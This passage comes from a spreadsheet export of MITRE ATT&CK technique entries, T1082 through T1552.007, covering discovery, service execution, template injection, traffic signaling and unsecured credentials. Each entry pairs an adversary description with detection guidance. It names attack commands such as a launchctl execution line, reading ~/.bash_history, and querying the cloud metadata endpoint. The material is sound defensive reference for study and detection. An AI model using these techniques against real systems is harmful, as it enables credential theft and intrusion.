Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS &lt;code&gt;systemsetup&lt;/code&gt; command, but it requires administrative privileges.
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082</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</si>
  <si>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and network information.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
In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t>Command: Command Execution, Instance: Instance Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as &lt;code&gt;GetLocaleInfoW&lt;/code&gt; can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)
Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.</t>
  </si>
  <si>
    <t>Hiroki Nagahama, NEC Corporation; Katie Nickels, Red Canary; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Wes Hurd</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>System Network Configuration Discovery: Internet Connection Discovery</t>
  </si>
  <si>
    <t>Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites.
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity.</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Utilities and commands that acquire this information include &lt;code&gt;whoami&lt;/code&gt;. In Mac and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>System Services: Launchctl</t>
  </si>
  <si>
    <t>Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>System Services: Service Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/002</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>04 October 2019</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;. (Citation: Technet Windows Time Service)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</t>
  </si>
  <si>
    <t>FIRST.ORG's Cyber Threat Intelligence SIG</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>David Routin; Michal Dida, ESET</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Brian Wiltse @evalstrings; Patrick Campbell, @pjcampbe11</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).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
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>Command And Control, Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.
The Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)</t>
  </si>
  <si>
    <t>Josh Day, Gigamon</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Traffic Signaling: Port Knocking</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Modification, Snapshot: Snapshot Creation, Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution: MSBuild</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1127/001</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Carrie Roberts, @OrOneEqualsOne</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</t>
  </si>
  <si>
    <t>IaaS, Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)
Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)
Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment,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
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
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
Additionally, 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</si>
  <si>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File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>Unsecured Credentials: Bash History</t>
  </si>
  <si>
    <t>Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>07 February 2020</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Unsecured Credentials: Cloud Instance Metadata API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Unsecured Credentials: Container API</t>
  </si>
  <si>
